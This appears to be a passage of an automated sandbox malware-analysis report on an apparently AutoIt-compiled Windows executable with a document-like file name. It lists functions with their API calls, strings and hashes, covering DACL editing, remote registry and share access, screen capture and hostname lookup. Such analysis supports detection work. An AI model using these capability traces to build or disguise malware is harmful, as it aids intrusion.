                                • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00CCBD04,?,?), ref: 00CCE564
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00CCBD04,?,?,00000000,?), ref: 00CCE57B
                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00CCBD04,?,?,00000000,?), ref: 00CCE586
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00CCBD04,?,?,00000000,?), ref: 00CCE593
                                • GlobalLock.KERNEL32(00000000), ref: 00CCE59C
                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00CCBD04,?,?,00000000,?), ref: 00CCE5AB
                                • GlobalUnlock.KERNEL32(00000000), ref: 00CCE5B4
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00CCBD04,?,?,00000000,?), ref: 00CCE5BB
                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00CCBD04,?,?,00000000,?), ref: 00CCE5CC
                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00CED9BC,?), ref: 00CCE5E5
                                • GlobalFree.KERNEL32(00000000), ref: 00CCE5F5
                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00CCE619
                                • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00CCE644
                                • DeleteObject.GDI32(00000000), ref: 00CCE66C
                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CCE682
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                • String ID:
                                • API String ID: 3840717409-0
                                • Opcode ID: 67a13ee4950c0064fffe6cbdd0b2f4ed709f66b8abb5a5334185c29a2115afd7
                                • Instruction ID: a26bcb3acc07cbe7e1f2700a1a55e2fb3f0bb92f8c9a36e8e74f39d974255510
                                • Opcode Fuzzy Hash: 67a13ee4950c0064fffe6cbdd0b2f4ed709f66b8abb5a5334185c29a2115afd7
                                • Instruction Fuzzy Hash: 86413C75600248EFDB119F65DC88FAEBBB9EF8A715F104058F916DB260D7319E01DB60
                                Function 00CB0B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                                Download Yara Rule
                                APIs
                                • __wsplitpath.LIBCMT ref: 00CB0C93
                                • _wcscat.LIBCMT ref: 00CB0CAB
                                • _wcscat.LIBCMT ref: 00CB0CBD
                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00CB0CD2
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CB0CE6
                                • GetFileAttributesW.KERNEL32(?), ref: 00CB0CFE
                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00CB0D18
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CB0D2A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                • String ID: *.*
                                • API String ID: 34673085-438819550
                                • Opcode ID: 06b005b54dfe154345ffb47d504248790eb6113f13c88ced58a23303d7406b26
                                • Instruction ID: 1880bc3d57eb346066787838808c17c61b450b7ab6a32a6bc5905c6ca39f77e0
                                • Opcode Fuzzy Hash: 06b005b54dfe154345ffb47d504248790eb6113f13c88ced58a23303d7406b26
                                • Instruction Fuzzy Hash: 708183715043059FC764DF64C885AEBB7E8BF88314F24892AF899C7251EB34EE85CB52
                                Function 00CCECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CCED0C
                                • GetFocus.USER32 ref: 00CCED1C
                                • GetDlgCtrlID.USER32(00000000), ref: 00CCED27
                                • _memset.LIBCMT ref: 00CCEE52
                                • GetMenuItemInfoW.USER32 ref: 00CCEE7D
                                • GetMenuItemCount.USER32(00000000), ref: 00CCEE9D
                                • GetMenuItemID.USER32(?,00000000), ref: 00CCEEB0
                                • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00CCEEE4
                                • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00CCEF2C
                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CCEF64
                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00CCEF99
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                • String ID: 0
                                • API String ID: 1296962147-4108050209
                                • Opcode ID: 9059a056e8beda7a12c260df07eb4aec5febd5a3532deef7b80d9ad56123e5b8
                                • Instruction ID: d6029166f0c7ae41b9fed8827e8020eb4c16e50a14b6954cfb01380e518e4884
                                • Opcode Fuzzy Hash: 9059a056e8beda7a12c260df07eb4aec5febd5a3532deef7b80d9ad56123e5b8
                                • Instruction Fuzzy Hash: A9816971208311AFDB10DF54D884F6ABBE8FB8A354F00492DF9A997291D730DA05DBA2
                                Function 00C9B593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C9B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00C9B903
                                  • Part of subcall function 00C9B8E7: GetLastError.KERNEL32(?,00C9B3CB,?,?,?), ref: 00C9B90D
                                  • Part of subcall function 00C9B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00C9B3CB,?,?,?), ref: 00C9B91C
                                  • Part of subcall function 00C9B8E7: HeapAlloc.KERNEL32(00000000,?,00C9B3CB,?,?,?), ref: 00C9B923
                                  • Part of subcall function 00C9B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00C9B93A
                                  • Part of subcall function 00C9B982: GetProcessHeap.KERNEL32(00000008,00C9B3E1,00000000,00000000,?,00C9B3E1,?), ref: 00C9B98E
                                  • Part of subcall function 00C9B982: HeapAlloc.KERNEL32(00000000,?,00C9B3E1,?), ref: 00C9B995
                                  • Part of subcall function 00C9B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C9B3E1,?), ref: 00C9B9A6
                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C9B5F7
                                • _memset.LIBCMT ref: 00C9B60C
                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C9B62B
                                • GetLengthSid.ADVAPI32(?), ref: 00C9B63C
                                • GetAce.ADVAPI32(?,00000000,?), ref: 00C9B679
                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C9B695
                                • GetLengthSid.ADVAPI32(?), ref: 00C9B6B2
                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C9B6C1
                                • HeapAlloc.KERNEL32(00000000), ref: 00C9B6C8
                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C9B6E9
                                • CopySid.ADVAPI32(00000000), ref: 00C9B6F0
                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C9B721
                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C9B747
                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C9B75B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                • String ID:
                                • API String ID: 3996160137-0
                                • Opcode ID: e3c33498f5e9d24774803805dca699bc68363c2ec1a58e40fe6bda120358e4bd
                                • Instruction ID: 69bf04acc038c5c885d19500366702faf0a8e3656add6e6f97e00f5973e9f51f
                                • Opcode Fuzzy Hash: e3c33498f5e9d24774803805dca699bc68363c2ec1a58e40fe6bda120358e4bd
                                • Instruction Fuzzy Hash: 21514C7190024ABFDF009F94ED89AEEBB79BF44314F048159F925AA290D7319E05CB60
                                Function 00CBA268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 00CBA2DD
                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00CBA2E9
                                • CreateCompatibleDC.GDI32(?), ref: 00CBA2F5
                                • SelectObject.GDI32(00000000,?), ref: 00CBA302
                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00CBA356
                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00CBA392
                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00CBA3B6
                                • SelectObject.GDI32(00000006,?), ref: 00CBA3BE
                                • DeleteObject.GDI32(?), ref: 00CBA3C7
                                • DeleteDC.GDI32(00000006), ref: 00CBA3CE
                                • ReleaseDC.USER32(00000000,?), ref: 00CBA3D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                • String ID: (
                                • API String ID: 2598888154-3887548279
                                • Opcode ID: 168377152cb9097ec48d39fe44025551a1b3b918578016e48a1210635ba74913
                                • Instruction ID: 8b97d3106f65f7280a75523647b3eb9b6359da9ca0fc1c04dbaaf1e195980a8a
                                • Opcode Fuzzy Hash: 168377152cb9097ec48d39fe44025551a1b3b918578016e48a1210635ba74913
                                • Instruction Fuzzy Hash: 1F513875900349AFDB15CFA8DC85FAEBBF9EF48310F14841DF99AAB220C731A9418B50
                                Function 00CAD520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                Download Yara Rule
                                APIs
                                • LoadStringW.USER32(00000066,?,00000FFF), ref: 00CAD567
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • LoadStringW.USER32(?,?,00000FFF,?), ref: 00CAD589
                                • __swprintf.LIBCMT ref: 00CAD5DC
                                • _wprintf.LIBCMT ref: 00CAD68D
                                • _wprintf.LIBCMT ref: 00CAD6AB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: LoadString_wprintf$__swprintf_memmove
                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                • API String ID: 2116804098-2391861430
                                • Opcode ID: a8b266546f99567596c77a4fbc4cf1d02c4ff259483ca2d76295d78792839583
                                • Instruction ID: 881da06b43c752d264a0552feb6f123007a046c7ec5afc92cc4fe3cb72bf268a
                                • Opcode Fuzzy Hash: a8b266546f99567596c77a4fbc4cf1d02c4ff259483ca2d76295d78792839583
                                • Instruction Fuzzy Hash: 66519F7190020ABACB25FBA0DD82EEEB779AF14304F104565F106B21A1EA715F49EFA0
                                Function 00CAD338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                Download Yara Rule
                                APIs
                                • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00CAD37F
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00CAD3A0
                                • __swprintf.LIBCMT ref: 00CAD3F3
                                • _wprintf.LIBCMT ref: 00CAD499
                                • _wprintf.LIBCMT ref: 00CAD4B7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: LoadString_wprintf$__swprintf_memmove
                                • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                • API String ID: 2116804098-3420473620
                                • Opcode ID: 88137bc0bd908197e70ffde9fc518aa3ea404891eb29c35671542208642a071f
                                • Instruction ID: abe822aaa0a41e8acf1e15553c4ea1d91ee35df6ea969bc81d4586750e2ed58e
                                • Opcode Fuzzy Hash: 88137bc0bd908197e70ffde9fc518aa3ea404891eb29c35671542208642a071f
                                • Instruction Fuzzy Hash: 7D51C471900209BBCB25FBE0DD82EEEB779AF18704F108565B106B20A1DA716F58EB60
                                Function 00C9AEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                • _memset.LIBCMT ref: 00C9AF74
                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C9AFA9
                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C9AFC5
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C9AFE1
                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C9B00B
                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00C9B033
                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C9B03E
                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C9B043
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                • API String ID: 1411258926-22481851
                                • Opcode ID: c828c5fb4c3f6733def9f81aab408bed6e0696f90a87ab01a9f0a338800ce7ed
                                • Instruction ID: 0598d6aacbb799a23e184ab0cb5b1689b900bc078aec541c747f5c793f7bcdb8
                                • Opcode Fuzzy Hash: c828c5fb4c3f6733def9f81aab408bed6e0696f90a87ab01a9f0a338800ce7ed
                                • Instruction Fuzzy Hash: 7E411B76C1022DABCF21EBA4DC859EEB7B8BF04704F044169E912A61A1EB719E05DF90
                                Function 00CC3AF7 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                Download Yara Rule
                                APIs
                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC2AA6,?,?), ref: 00CC3B0E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BuffCharUpper
                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                • API String ID: 3964851224-909552448
                                • Opcode ID: eea5aa679f8c676c1801ef786e90920ce3f2df9b93dc196c7466566c5305fab1
                                • Instruction ID: 0aef85e59c31ec38db3937ca094ff55dbe64cf1948a4d012e81f86e48e28cd68
                                • Opcode Fuzzy Hash: eea5aa679f8c676c1801ef786e90920ce3f2df9b93dc196c7466566c5305fab1
                                • Instruction Fuzzy Hash: B6419F7415028A9BDF04EF04F880BEE3761BF16350F148A2CFC655B295DB309E5ADB61
                                Function 00CA83D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00CA843F
                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00CA8455
                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CA8466
                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00CA8478
                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00CA8489
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: SendString$_memmove
                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                • API String ID: 2279737902-1007645807
                                • Opcode ID: 5b1f0d97b4c4ac454b6a13072a9d1af84973798b76f1475cbe9b21b77b7083c9
                                • Instruction ID: dba13d5ad3386577c6ff436bce3b7ab3e7873ba319a0ce034f51dd595a4585a9
                                • Opcode Fuzzy Hash: 5b1f0d97b4c4ac454b6a13072a9d1af84973798b76f1475cbe9b21b77b7083c9
                                • Instruction Fuzzy Hash: 3311E761A4016E7ED720A7A1DC9ADFF7B7CEF96B04F4008297411A20D0DEB04E8DC5B0
                                Function 00CA8097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • timeGetTime.WINMM ref: 00CA809C
                                  • Part of subcall function 00C7E3A5: timeGetTime.WINMM(?,7608B400,00CD6163), ref: 00C7E3A9
                                • Sleep.KERNEL32(0000000A), ref: 00CA80C8
                                • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00CA80EC
                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00CA810E
                                • SetActiveWindow.USER32 ref: 00CA812D
                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CA813B
                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CA815A
                                • Sleep.KERNEL32(000000FA), ref: 00CA8165
                                • IsWindow.USER32 ref: 00CA8171
                                • EndDialog.USER32(00000000), ref: 00CA8182
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                • String ID: BUTTON
                                • API String ID: 1194449130-3405671355
                                • Opcode ID: 3fb9709b381d801c268c6d4d07816192469973d75b68d0996724f504db0ff5ae
                                • Instruction ID: 73cfb46fff04bd9a45641123faaadb2f74167f8e72455f127a753d599519092e
                                • Opcode Fuzzy Hash: 3fb9709b381d801c268c6d4d07816192469973d75b68d0996724f504db0ff5ae
                                • Instruction Fuzzy Hash: 592187B0200346BFE7326B21ECC9B2E3B6AF72634CB040155F522C6261CF765D5B9721
                                Function 00CA32B0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 72windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00CD3C64,00000010,00000000,Bad directive syntax error,00CFDBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00CA32D1
                                • LoadStringW.USER32(00000000,?,00CD3C64,00000010), ref: 00CA32D8
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • _wprintf.LIBCMT ref: 00CA3309
                                • __swprintf.LIBCMT ref: 00CA332B
                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00CA3395
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                • API String ID: 1506413516-4153970271
                                • Opcode ID: c0e3cced1a2d35bfa463d70d48be58cb018c33ca852a51bda931b20f8a13324d
                                • Instruction ID: 210abfa3e24fc8058ef5166f46bc4937f1e6bf44ee981ef5195683ac6113c49d
                                • Opcode Fuzzy Hash: c0e3cced1a2d35bfa463d70d48be58cb018c33ca852a51bda931b20f8a13324d
                                • Instruction Fuzzy Hash: 5F219C7184425EBBCF15AFD0CC8AEEE7739BF28704F004455B516A50A2EE71AB58EB60
                                Function 00CA78EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                • String ID: 0.0.0.0
                                • API String ID: 208665112-3771769585
